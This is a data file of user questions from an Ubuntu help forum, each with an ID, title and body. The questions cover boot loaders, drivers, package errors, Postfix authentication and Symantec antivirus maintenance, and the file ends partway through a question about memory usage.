232439	lubuntu 12.04 : unresponsive windows with certain applications	os : lubuntu 12.04 64-bit ( ubuntu 12.04 with lxde ) system : hp dv7-1040ed notebook with nvidia gpu : nvidia corporation g96 [ geforce 9600m gt ] ( rev a1 ) when working with certain applications windows become unresponsive or take ages to load and when i move my mouse outside of the window the application immediately becomes responsive again . some examples : thunderbird : opening thunderbird goes fine but as soon as i click on a folder thunderbird starts loading which takes way too long . if i just let thunderbird continue it will eventually become responsive again . if i click on a folder and immediately move my mouse pointer outside the thunderbird application window thunderbird immediately loads the folder and remains responsive . qtractor : if i load a project with a lot of plug-ins it takes up to 40 seconds for qtractor to load the project and become responsive . if i load the same project and move my mouse pointer outside of the qtractor window that same project loads within 10 seconds . if necessary i could upload a screencast since this is quite a generic and vague issue . i 've tried different window managers but that does n't make any difference . on the same notebook i also have a ubuntu 12.04 32-bit with unity which does n't show this behavior . my 64-bit lubuntu machine at work seems to be unaffected also . regarding qtractor loading that specific project , i 've run a strace on qtractor and it seems as if it 's looping on loading the different dssi plug-ins ( zynaddsubfx dssi in this case ) . i 'm running a non-debug build unfortunately and will install a debug build and post any useful outcome here . this issue only occurs when i start qtractor /path/to/project from a terminal or from a desktop file . when i start qtractor as is and then open the project from the menu it loads fine . i hope someone 's got a hunch of what 's going on here and if any additional information is needed i 'm happy to provide it . regards , jeremy
232440	how do i install uudecode ?	i am using ubuntu v12.10 , 64bit , us english and am new to linux and ubuntu ; hence detailed instructions are welcome . could someone show me where and how to download uudecode ? also specific commands on how to run/install uudecode would be most helpful . the error message is as follows : validating available tools ... error : required utility missing : uudecode . please install this utility before using this intelligent updater package .
232442	how do i navigate between directories in terminal ?	i am new to linux and ubuntu and have tried changing to folders/directories with some difficulty . could someone explain why the following commands failed to change to the desired target folder/directory ? sharon @ sharon : ~ $ cd home bash : cd : home : no such file or directory sharon @ sharon : ~ $ cd /home bash : cd : /home : no such file or directory sharon @ sharon : ~ $ cd documents sharon @ sharon : ~/documents $ cd downloads bash : cd : downloads : no such file or directory sharon @ sharon : ~/documents $ cd /downloads bash : cd : /downloads : no such file or directory sharon @ sharon : ~/documents $
232450	how do i gain access to these programs ?	sharon @ sharon : ~ $ cd /opt/symantec/symantec_antivirus sharon @ sharon : /opt/symantec/symantec_antivirus $ ./rtvscand -k shutdown no permission to access rtvscand sharon @ sharon : /opt/symantec/symantec_antivirus $ ./symcfgd -k shutdown no permission to access symcfgd sharon @ sharon : /opt/symantec/symantec_antivirus $ could someone provide detailed instructions as to how to gain access to the 2 programs ? i am new to linux and ubuntu and running version 12.10 , 64bit , us english .
232455	what 's easiest way to get nas to mount in12.04	still fighting to get my nas ( dlink ) to mount in 12.04 , same message as most other folks i see , i 've tried a bunch of fstab stuff and i 've tried to use samba , not getting it . is there a step by step for this yet , i can see it , and the files with upnp inspector but can not play any thing i 'm getting desperate ! the nas was setup with my win 7 computer but that computer blew up so got a new one , installed 12.04 on it , the only other computer on the network is my xp laptop , the nas shows up when i browse network by itself and in my windows network icon too but still get the unable to mount location - failure to retrieve share list from server message . i 've installed samba thru the software cente , and the nas is at 192.168.1.102 called dlink-034273 and the shared folder is called volume_1 when i go to the address of the nas in a browser the login screen is setup as admin and i dont put a passwrd or username in , just click login and i get all the nas management
232460	how do i `` stick '' the `` terminal '' window to launcher a.k.a . unity panel ?	i am new to linux and ubuntu . by now i have discovered that i need to launch the terminal window whenever i run programs . hence i would like to stick the terminal window to the launcher a.k.a . unity panel . can it be done ? if it ca n't be done , what keyboard shortcuts are there to quickly bring up the terminal window ? as of now , i have to click on the dash home icon , click on the second left icon on the little menu bar at the bottom of the dash home window , click on installed ( see more results ) in order to bring up a terminal window .
232464	how do i install lxml.etree in ubuntu 12.04 ?	i tried : apt-get install python-lxml but that gives this - unable to locate package python-lxml
232469	how should i remove or empty these files or folders ?	below are the instructions that i need to carry out : 1 . navigate to the symantec antivirus virus definitions directory ( default location is : `/opt/symantec/virusdefs` ) in the terminal . 2 . remove any `*.tmp` or `temp` files or folders . 3 . remove any numbered folders . 4 . ensure that the 3 remaining folders are empty . if they are not empty , empty them . - `binhub` ( expected to be full ) . - `incoming` ( usually empty , if it 's not , this may be an indication of what is wrong ) . - `texthub` ( also usually empty ) . question # 1 : what specific commands must i issue to remove the tmp or temp files/folders ? question # 2 : what specific commands must i issue to empty binhub , incoming and texthub ? question # 3 : i noticed that if i click on the home folder icon on the launcher , then click file system , navigate to the destination foler , i can see the tmp , temp and numbered folders . can i right click on each of them and choose âmove to trashâ ? is this method equivalent to your answer to question # 1 ? as always , detailed explanations are welcome for newbies like me . update # 1 : in answer to my own question # 3 : the method does n't work as ( a ) there is no `` move to trash '' option after right-clicking the folder . the folders contain many files . ( b ) all the folders named in the preceding paragraph need root permission . ( c ) conclusion : no choice but to remove non-empty folders using a terminal window with the following command : sudo rmdir -rfv < foldername > the above command successfully remove all the non-empty folders . update # 2 : i am stuck at emptying folders , viz . definfo.dat and usage.dat . please see below : sharon @ sharon : /opt/symantec/virusdefs $ sudo echo > definfo.dat bash : definfo.dat : permission denied sharon @ sharon : /opt/symantec/virusdefs $ sudo echo > usage.dat bash : usage.dat : permission denied sharon @ sharon : /opt/symantec/virusdefs $ sudo cat [ sudo ] password for sharon :
232470	lubuntu 12.10 64-bit : programs wo n't run	i hope , i can get an answer , i did n't find any related topic , so i decided to make a new one ... so i tried to install several applications like neverball or supertux and they do install , but in fact i always get a segmentation fault , when i try to run these programs ... so is there a way to fix this . i tried a few things ... whether i installed it with apt-get install or by using the software center , it installs , but it does n't run , neither using the command line nor clicking on the corresponding icons . this problem does n't for instance apply to openoffice , it seems especially games wo n't run ... here for instance the output for supertuxkart : irrlicht engine version 1.7.3 linux 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 x86_64 [ filemanager ] data files will be fetched from : '/usr/share/games/supertuxkart' [ filemanager ] addons files will be stored in '/home/username/.local/share/supertuxkart/addons ' . [ translate ] env var language = 'de_de.utf-8' [ translate ] env var language = 'de_de.utf-8 ' , which corresponds to 'german ( germany ) ' adding language fallback de [ irrdriver ] trying opengl rendering . speicherzugriffsfehler ( segmentation fault ) the output for sudo lspci | grep vga : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6400m/7400m series ] note that purging fglrx and reinstalling the proper versions of libgl and libglx will not solve the problem at all ...
232471	video server for ps3	i am trying to get my ubuntu desktop to be able to share videos so my ps3 can watch them over my network . i would like a folder , or something similar that i can share as a media center so all of the videos in that folder will be shared and accessible by my ps3 .
232475	possible dns issues , web pages not loading , `` server not found '' on all browsers	being pretty new to unbuntu , linux in general , i 've still attempted to solve this problem myself without making a new account before i had much knowledge of the issue . occasionally i will have slow page loading times , and then `` server not found '' in firefox . the issue comes up in safemode , and in chromium as well . trying to load facebook as it 's not actually loading , pinging does n't get any results . here 's my lspci : 03:07.0 network controller : ralink corp. rt2760 wireless 802.11n 1t/2r i 've switched to the experimental driver for this , but i believe using the driver and blacklisting all the other drivers has completely disabled my wireless all together , forcing me to just use my lan . i 've done some dns troubleshooting and switched to the google dns . still get slow loading and usual `` server not found '' message . i 'm going to take my wireless drivers off the blacklist , but i do n't think that 'll do anything beyond make my wireless card usable again . i 'm using 12.10 as well , which makes for a crazy time since the beginning , and the net cutting in and out has been a doozy as well . i also already have the linux backport modules . so far nothing has fixed this . any ideas ? i was n't sure what else to post for information anyone needs to help fix this . sorry !
232476	unable to open system config nor terminal	i have a toshiba l745 with 4gb of ram and a dual core of 2.20 ghz . i recently update ubuntu 12.10 and when i restarted it takes too long to start , even worse , i notice that it works wrong . i press ctrl+alt+t and the terminal does n't open , i ca n't open the system config , some programs like gparted does n't open and a lot of other works slow . i tried reinstaling the os but it does n't boot from the cd nor the pendrive .
232477	font messed up after kubuntu-desktop installed	i wanted to try kde , so i installed kubuntu-desktop , i did n't like it so i removed . that messed up my font configuration in ubuntu . firefox and menu bar are ok , however , the rest ( eclipse , monodevelop , lipiks , all message boxes ... ) i need help please .
232481	running ubuntu on asus n56vz ?	i am planning to buy an asus n56vz with windows 8 pre-installed . will this notebook be able to run ubuntu without problems ? the specs on the computer are : part number : n56vz-s4278h cpu : i7 3630qm memory : 8gb 2x4gb hard drive : 750gb 7200rpm graphics : gt650 ddr3 4gb dvd : blu-ray 6x leitor wireless : 802.11bgn 10/100/1000 mbps windows 8 64 bits
232483	pc wo n't boot anything but ubuntu	well , i decided to give ubuntu 12.10 a try but really is n't for me , mostly because i 'm a gamer at heart and the game selection on linux is very limited . : p i want to revert back to windows 7 but i ca n't seem to be able to access the recovery partition on my desktop . it 's an acer , so the alt + f10 combo should trigger the recovery management during the boot , but for some reason it does n't : the pc goes straight into ubuntu . i 've tried reinstalling windows from a dvd but it looks like the computer is ignoring whatever boot command i give it . i changed the boot order inside the bios , i tried to directly tell the pc ( with the built in function ) to boot from the dvd but nothing : the pc wo n't boot anything but ubuntu . i can tell the recovery partition is still there because the disk management says that out of my 1tb , 60gb are already occupied by stuff , and i do n't think ubuntu takes that much space . so , something must have screwed up the boot system . any ideas on how could i fix this ? thanks in advance . edit : i should have added that ubuntu 12.10 is the only os installed on the hdd at the moment . i 'd like to reinstall windows from either the recovery partition or the dvd but they just wo n't boot up ! the pc goes straight into ubuntu , regardless of what i do/click .
232495	installed ubuntu 12.10 on macbook pro ( late 2011 ) - can not detect wireless network ?	i am as good as a beginner in linux , and i 'm sure i need to install the wireless driver for the macbook 's wireless card to pick up the wireless network . i just do n't know how . thanks in advance ! : ) rhys
232496	ubuntu 12.10 and macbook air 1,1 - no sound ( speakers + microphone ) - headphone ok	i ran lspci | grep audio and got : 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) i 've searched the forums and added the following line to alsa.conf # macbook air sound options snd-hda-intel model=mbp3 i rebooted and there was still no sound . so i ran alsamixer . it shows that the speakers and master are not muted . the speakers and microphone are still not working . what can i do to get them to work ? i 'm running a single-boot ubuntu 12.10 system with a 64-bit kernel , on a macbook air 1.1 . i also ran the command hwinfo and got the following results 'hwinfo -- sound hal.1 : read hal dataprocess 2630 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 13 : pci 1b.0 : 0403 audio device [ created at pci.318 ] unique id : u1nb.4u0caok3k5c sysfs id : /devices/pci0000:00/0000:00:1b.0 sysfs busid : 0000:00:1b.0 hardware class : sound model : `` intel 82801h ( ich8 family ) hd audio controller '' vendor : pci 0x8086 `` intel corporation '' device : pci 0x284b `` 82801h ( ich8 family ) hd audio controller '' subvendor : pci 0x106b `` apple computer inc. '' subdevice : pci 0x00a2 revision : 0x03 driver : `` snd_hda_intel '' driver modules : `` snd_hda_intel '' memory range : 0x90500000-0x90503fff ( rw , non-prefetchable ) irq : 43 ( 338 events ) module alias : `` pci : v00008086d0000284bsv0000106bsd000000a2bc04sc03i00 '' driver info # 0 : driver status : snd_hda_intel is active driver activation cmd : `` modprobe snd_hda_intel '' config status : cfg=new , avail=yes , need=no , active=unknown'
232497	how to access gvfs mounts from command line ?	i have some samba share mounted via nautilus and i 'd like to access the files from command line . they used to appear under $ home/.gvfs but not any more . where have they gone to ?
232498	how to config postfix when send email need login ?	how to config postfix when send email need login ? i have config postfix server to send email to my customers . i found postfix can send mail without login . i doubt it might be used for other ones send spam email , so who can help me ? smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no append_dot_mydomain = no # delay_warning_time = 4h readme_directory = no smtpd_tls_cert_file = /etc/ssl/certs/ssl-mail.pem smtpd_tls_key_file = /etc/ssl/private/ssl-mail.key smtpd_use_tls = yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache myhostname = domain.com alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = domain.com , localhost # mydestination = hash : /etc/postfix/mydomains relayhost = relay_domains = gmail.com , hotmail.com,163.com , qq.com mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all home_mailbox = maildir/ mailbox_command = /usr/lib/dovecot/deliver -c /etc/dovecot/conf.d/01-mail-stack-delivery.conf -m `` $ { extension } '' smtpd_sasl_local_domain = $ myhostname smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous smtp_sasl_security_options = noanonymous broken_sasl_auth_clients = yes # smtpd_recipient_restrictions = permit_sasl_authenticated , reject_unauth_destination , reject_unknown_sender_domain , reject_unauth_pipelining # smtpd_recipient_restrictions = reject_unauth_pipelining smtpd_recipient_restrictions = permit_mynetworks , reject_invalid_hostname , reject_non_fqdn_hostname , reject_non_fqdn_sender , reject_non_fqdn_recipient , reject_unauth_destination , reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_rbl_client bl.spamcop.net , permit smtpd_helo_restrictions = permit_mynetworks , reject_non_fqdn_hostname , reject_invalid_hostname , permit # smtpd_recipient_restrictions = reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_pipelining , permit_mynetworks , permit_sasl_authenticated , reject_unauth_destination smtp_tls_security_level = may smtpd_tls_security_level = may smtpd_tls_auth_only = no smtp_tls_note_starttls_offer = yes smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev : /dev/urandom policy-spf_time_limit = 3600s smtpd_sasl_type = dovecot smtpd_sasl_path = private/auth smtpd_sasl_authenticated_header = yes smtpd_sender_restrictions = reject_unknown_sender_domain smtpd_client_restrictions = sleep 1 , reject_unauth_pipelining , permit_sasl_authenticated smtp_use_tls = yes smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_mandatory_ciphers = medium # authorized_submit_users = bitwolaiye smtpd_helo_required = yes smtp_sasl_mechanism_filter = plain , login
232502	bootloader problem - triple boot - ubuntu/win7/win8	i have a problem regarding mbr etc . so , basically i was trying to put 3 os in one msata ssd ( i have another internal hdd for data etc. ) . the first steps what i did was : 1. install win 7 2. install win 8 3 . i backed up both os with acronis true image 4 . i took the hdd out to make the ubuntu installation easier and using this guide : http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/2/ 5 . i put the hdd in again 6 . i set it up with easybcd 7 . i choosed the option ubuntu in mbr , then came the text : '' minimal bash-like line editing is supported ... .. '' 8 . then i boot ubuntu with livecd ( bootable usb : ubuntu-secure-remix-12.10-64bit ) and used bootrepair ( recommended setting ) , reboot ... 9 . then i choosed ubuntu again and the text showed again . 10 . now i am posting the link from bootrepair : http : //paste.ubuntu.com/1463596/ so , what should i do now ? thank you in advance ! regards , nell
232504	if we create an efi partition , will itstop windows 8 from booting ?	im trying to setup dual booting . the laptop came with windows 8 pre installed and uefi and quick boot enabled . in the ubuntu uefi documentation it tells us to create a efi partition in the beginning of the disk . but if we do this , the windows 8 wo n't boot right ?
232506	how to install ubuntu from usb if bios have no such option	how to install xubuntu from usb if bios have no such option.my pc have no cd drive . it is a pentium iii , 128 mb ram , 20 gb hdd .
232511	ardour , system has a limit for maximum amount of locked memory	after installing and starting ardour i receive the following warning message : warning : your system has a limit for maximum amount of locked memory . this might cause ardour to run out of memory before your system runs out of memory . you can view the memory limit with 'ulimit -l ' , and it is normally controlled by /etc/security/limits.conf how to configure properly ardour to avoid this message ?
232513	how to browse or search software package list with the right version naming ?	i want to install a specific version of ipython ( 0.13.1 ) , but it kept telling me that particular version does not exist . i am wondering if i am using the wrong version name , so it can not match the version i want to what is available out there . thank you !
232515	how can i clone a hard disk to a smaller ssd ?	i have a hard drive in my laptop with a windows and an ubuntu partition . i got an ssd to replace my hard drive , but it has a slightly lower capacity . i 've already partitioned the ssd to the sizes i want , and each partition on the new disk is larger than the amount of used space on my old hard drive . i was going to use dd , but it appears that it requires partitions to be the same size . how can i copy my old partitions onto my new ssd ? i 'm copying my boot partition too , so how can i make sure the new disk is bootable , and the new partitions are exactly the same as the old ones ( but with less free space ) ?
232516	grub boot order problems after update	my grub menu went through rather extensive changes after the last update . it started booting to my old 12.04 entry by default . where this gets confusing is that there is no longer a 12.10 entry in grub.cfg . i installed and tried the grub-cfg as mentioned in how do i change the grub boot order ? and everything appeared to go ok but when i rebooted to test , the boot menu looked the same and the behaviour was the same . i restarted grub configure and the changes it indicated that my changes had happened . i looked at /etc/default/grub expecting that it would have changed after save from the grub configure tool but it had not . i then modified /etc/default/grub : < grub_default= '' ubuntu '' -- - > grub_default= '' ubuntu , with linux 12.04 3.2.0-24-generic '' because the entry in /boot/grub/grub.cfg that i needed for the boot looks like : '' ubuntu '' -- class ubuntu -- class gnu-linux -- class gnu -- class os ... and ran sudo update-grub as instructed . grep for '^menu ' in grub.cfg gives me the following : menuentry `` ubuntu '' -- class ubuntu -- class gnu-linux -- class gnu -- class os ... menuentry `` ubuntu , with linux 12.04 3.2.0-24-generic '' -- class ubuntu ... menuentry `` memory test ( memtest86+ ) '' { menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows - ... menuentry `` windows recovery environment ( loader ) ( on /dev/sda3 ) '' ... the menu at boot still looked as it had before and still booted to the old 12.04 system and does not reflect the info in the grub.cfg file . what is going on ? ? thanks .
232517	there is an error when i try to install virtual box into ubuntu	when i tried to install virtual box in ubuntu it showed up an error . it says dependency is not satisfiable : lib 9th - network ( < > =4:4.5.3 ) please let me know how to handle this error .
232520	mouse speed on new x server for game	i used the following script to open the game on new x server . # ! /bin/sh export war3_path= '' /media/8c2667b026679a4a/program files ( x86 ) /warcraft iii frozen throne esk/ '' x :3 -ac -terminate & # cd `` $ { war3_path } '' sleep 2 display=:3 `which wine` war3.exe -opengl # it works pretty well , i can switch screen by ctrl+alt+f7 f8 . but there is one problem . mouse speed is too fast in the new x server , makes me uncomfortable during playing the game ... is there the way to ajust the mouse speed on new x ? thanks ~
232524	downgrade ubuntu ?	recently i selected to upgrade my ubuntu 12.04lts to ubuntu12.10 . there are some issues in this version because of which the cpu is getting heated up ( intel core i3 ) . i would like to know if there are some known problems in the release that can be rectified or is there a way to downgrade the ubuntu release ?
232526	can not boot into windows 8 after successful ubuntu installation	recently i 've tried to install ubuntu in a partition of a hard-drive that also has windows 8 . i 've done this on a windows 7 computer before , so i figured this would be done similarly . i installed it using a ubuntu usb drive . when i attempt to boot in windows 8 , a quick _ gets displayed , and then i get moved back to the boot screen where i can select what i wish to boot from . here is my fdisk -l output : disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdec26e36 device boot start end blocks id system /dev/sda1 2048 144584 71268+ de dell utility /dev/sda2 145408 18057059 8955826 7 hpfs/ntfs/exfat /dev/sda3 * 18057216 437300047 209621416 7 hpfs/ntfs/exfat /dev/sda4 437301246 500117503 31408129 5 extended /dev/sda5 437301248 492031999 27365376 83 linux /dev/sda6 492034048 500117503 4041728 82 linux swap / solaris i do have several extra partitions on the hard-drive for work related reasons as well , so treat any extra non-linux related partitions as such . as you can see , my windows partition is still in-tact , as well as sda1 - sda6 . i can also view my windows partition using this ubuntu version . does anyone have any idea why i am unable to boot into windows 8 ? any help would be appreciated , as i need to do work on both windows 8 and linux .
232531	unmet dependencies . try using -f	i 'm running into the following error when i 'm installing any package on 12.04 . reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : postgresql-client-9.1 : breaks : postgresql-9.1 ( < 9.1.7-0ubuntu12.04 ) but 9.1.6-1~precise2 is installed e : unmet dependencies . try using -f. tried following commands , sudo apt-get autoremove sudo apt-get autorclean sudo apt-get install -f sudo apt-get purge postgresql sudo apt-get purge postgresql-client-9.1 sudo apt-get autoremove -- purge postgresql-client-9.1 sudo apt-get autoremove -- purge postgresql sudo apt-get remove -- dry-run postgresql sudo apt-get update etc . but none of this could save me . any idea ?
232532	ca n't get wireless working on 12.10 and dell latitude d630	yes , i 've looked at several other posts , and other sites trying to figure out what 's up , but i 've followed the steps , and had no success . note that i 'm a relative newbie to setting up wireless on ubuntu , so please feel free to suggest dumb errors like `` is it on '' , i very likely missed something fundamental . output from a couple of commands : $ lspci | grep 0c:00.0 network controller : broadcom corporation bcm4311 802.11a/b/g ( rev 01 ) $ iwconfig lo no wireless extensions . eth0 no wireless extensions . additional drivers says `` using broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) '' i 've tried sudo apt-get install bcmwl-kernel-source it just gives errors : sudo apt-get install bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : bcmwl-kernel-source 0 upgraded , 1 newly installed , 0 to remove and 129 not upgraded . need to get 0 b/1,150 kb of archives . after this operation , 3,120 kb of additional disk space will be used . selecting previously unselected package bcmwl-kernel-source . ( reading database ... 204100 files and directories currently installed . ) unpacking bcmwl-kernel-source ( from ... /bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_i386.deb ) ... setting up bcmwl-kernel-source ( 5.100.82.112+bdcom-0ubuntu3 ) ... loading new bcmwl-5.100.82.112+bdcom dkms files ... building only for 3.5.0-18-generic building for architecture i686 building initial module for 3.5.0-18-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-18-generic/updates/dkms/ depmod ... . dkms : install completed . error : module b43 does not exist in /proc/modules error : module b43legacy does not exist in /proc/modules error : module ssb does not exist in /proc/modules error : module bcm43xx does not exist in /proc/modules error : module brcm80211 does not exist in /proc/modules error : module brcmfmac does not exist in /proc/modules error : module brcmsmac does not exist in /proc/modules error : module bcma does not exist in /proc/modules update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-18-generic also , more output sudo lshw -c network *-network unclaimed description : network controller product : bcm4311 802.11a/b/g vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fe8fc000-fe8fffff *-network description : ethernet interface product : netxtreme bcm5755m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:1c:23:5b:29:73 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 duplex=full firmware=5755m-v3.29 ip=192.168.1.69 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : fe7f0000-fe7fffff any ideas ? sorry about the formatting getting messed up on the quotes
232533	xfce on nexus 7 : onboard and closing windows	i have recently installed xfce on my nexus 7 ubuntu installation and i really like the increased speed , but i just have two issues with it : the onboard does not pop up automatically when i click on a text field , and when i went to the `` onboard '' section in settings , it was already set to appear automatically . i ca n't close windows using the `` x '' in the top right corner for some reason . i do n't think it 's a touch precision issue , but sometimes a faint box appears around the x when i get really close . i do n't think the minimize or maximize buttons work either . are either of these fixable ?
232537	programing language of application in linux	i 'm wonder programs and application on linux has written by with programing language ... i think most of them have written by c ... if it 's true with what ide they can write a program such as clementine and etc ? i 'm writing programs in mono and eclipse in c # and java but i really do n't want to use this kind of programing language because they need some tools like .net framework or java runtime to run ... i want to write a program in an ide that when i exported my program it does n't need anything else to run ... i mean it standalone and run , and i want to export my program to run it on any os i want such as windows or linux .
232538	does not boot ubuntu ?	i had ubuntu installed . when i installed ubuntu i completely formated the hard disk and then i made 3 partitions , one for root , one for home , and one for data.i left 25 gb unused . all partitions were ext 4 . after some months now i have installed the windows 8 in the free space ( 24gb ) . now it directly boots windows 8 and does not ask for the choice between windows 8 and ubuntu . i can only access the partition in which i have installed the windows . i want it to ask for choice between windows 8 or ubuntu or some other way to run ubuntu or to access the data in the other partitions . because i have very imported data there . i 'm using hp pavilion dv6 i3 . 320gig hard disk .
232539	at the time of gnome desktop installation ubuntu software center removed , unable to install anymore	at the time of gnome desktop installation , it has removed all the dependencies of sso login python and ubuntu software center . i 've tried to rebuilt them using sudo apt-get update , sudo apt-get upgrade with -f , but no result . thanks and regards utpal
232542	how can i install the ati video card driver for ubuntu 12.04 ? ( ati radeon hd 3200 )	i do n't know if there really is an answer on this web site , i have searched a lot in all kinds of forums but i do n't find the answer , i want to install my drivers the best way possible , but there is an error when i try to install the video drivers in the terminal . the error is : `` distro version entered incorrectly or not supported , use -- listpkg to identify valid distro versions '' . as i do n't know what a distro version is i do n't really understand this error , my ubuntu version is 32-bit , pleas help .
232543	user to access only to specific ip addresses	how can i setup ubuntu box so logged user can access only to several ip addresses , on all protocols ? additional problem is that ubuntu uses proxy to acceess to internet . tried with ufw , but did not manage with it ( probably because pf proxy ? )
232550	grub issue . black screen , blinking cursor	so i installed ubuntu after windows was wiped out by destiny and everything was fine until i was n't able to start ubuntu : it would stuck in a black screen with a blinking cursor forever . i made a bootable usb and the trick is , i can boot from usb , then restart my laptop and then and only then , it is able to boot from hard disk and i can access my archives and everything , until i turn it off and then i have to boot again from usb ... etc . i am using 11.10 in a dell inspiron 1501 with an ati rs482 [ radeon xpress 200m ] video card note 1 . i already re-installed grub and updated it , which gave me a grub screen each time i turn on the laptop but nothing else . i do n't know what else to do . note 2 . i used boot repair to no progress but i have this now : http : //paste.ubuntu.com/1468879/
232553	deleting files from file system	i am quite new to ubuntu . i accidentally installed xampp in my file system . i am not able to add files to htdocs of the lamp folder nor am i able to remove the files from the file system . can i somehow un-install and re-install xampp ?
232554	boot fails after `` checking battery state ''	i am on ubuntu 12.04 . as i was working icons on the top bar started disappearing . i tried to switch between the various windows but alt + tab was not working . i tried using the mouse to switch between windows but to no avail . on rebooting , the screen stops at *checking battery state . insmod : ca n't read `/usr/local/bin/ztemtapp/ztemtusbserial/ztemt.ko ' . no such file or directory . output of /var/log/syslog is http : //paste.org/59250 i tried the answers given here boot hangs after `` checking battery state ... '' .but that does n't work . i reconfigured lightdm and restarted but that also did not work . could someone please help me out ?
232557	how to install gimp 2.8.2 on unity ubuntu 12.04 ?	merry christmas everyone ! my first post as a new linux user . the gimp version in ubuntu software center is 2.6 , will it automatically updated to 2.8.2 after installation ? how to install all the plugins as we can do in linux mint ? thank you in advance ! `` never be afraid to ask the same questions as the answers can always be different ! ''
232564	sharkoon drakonia gaming mouse does n't work at all	i 've got a new mouse `` sharkoon drakonia '' , a gaming mouse with 11 buttons and high changable resolution . the problem is , that the mouse does n't work . only the leds are visible , but wether the buttons nor the mouse movement ist recognized . under windows the mouse works out of the box ( main buttons , movement , forward and backward , the other buttons not yet tested ) . also the lsusb seems not to see it right : bus 003 device 002 : id 04d9 : a067 holtek semiconductor , inc .
232565	remove or disable users taskbar	is it possible to remove or disable user 's taskbar ? i have to setup ubuntu box , so user can run only web browser and nothing else .
232569	deskbar-applet function for ubuntu 12.10 non-unity ?	is there any tool similar to deskbar available for ubuntu 12.10 ? using unity , the file lens does the job , but i ca n't work with unity , so i have to use another desktop environment ( fallback version/xfce ) . the workflow that i need is the typical deskbar one , ie. , for opening a random file : - using a keyboard shortcut globally available - typing the first letters of the name - having the default file already selected and executable with just enter - having the other files selectable just with a simple arrow selection ( and then just enter ) i 've tried catfish , but it 's relatively slow , and in order to find the files i have to click each time on `` deep search '' . i ca n't find beagle or tracker either . what can i do ?
232570	linux partition is not shown by fdisk	i want to reinstall my grub boot loader but when i boot ubuntu from usb and type sudo fdisk -l on terminal , it do n't show my linux partion which i need to know to reinstall grub.i had used this method several times in past and it worked great for me.but today fdisk is not showing linux partiions.snapshots are given below :
232571	how to empty the active block list in selfcontrol ?	i 'd like to empty the active block list of hosts from this productivity software called selfcontrol ( anyone knows about it ? ) because some of these websites are duplicates . i 've tried pressing del key , right-clicking on the website entries , dragging them into the main window and then pressing the `` delete '' button -- nothing works . is there some work-around ? should i modify some configuration file with my sudo privileges ? i downloded the application as a *.deb package from the official site . i 'm including 2 screen-shots .
232572	how to get rid of nvidia powermizer ?	i 've been trying to turn off nvidia powermizer ( that is set the performance level to 2 - max ) . i can do it with nvidia-settings , but it goes back to default after restart . here 's what i have tried : nvidia-settings as root - saving settings to xorg.conf and ~/.nvidia-settings-rc adding'options nvidia nvreg_registrydwords= '' perflevelsrc=0x2222 '' ' to /etc/modprobe.d/nvidia.conf - nothing happened adding option `` registrydwords '' `` powermizerlevel=0x2 '' `` powermizerlevelac=0x2 '' to xorg.conf under device section : gdm did not start up - had to delete xorg.conf to recover adding option `` registrydwords '' `` powermizerenable=0x0 '' to xorg.conf : nothing happened any idea how i can do this ? p.s . ubuntu 12.10
232574	fresh ubuntu installation - memory usage went from 3 % to 41 % - should i be concerned and how to remedy ?	my memory usage was a 4 % after a fresh ubuntu 12.10 installation after i install php packages etc using this gist , https : //gist.github.com/4372049 my memory usage now reached 41 % . should i be concerned ? if not , then at what memory usage level should i be concerned ? if yes , then what remedies should i do ? update : based on suggestion to post my top followed by >
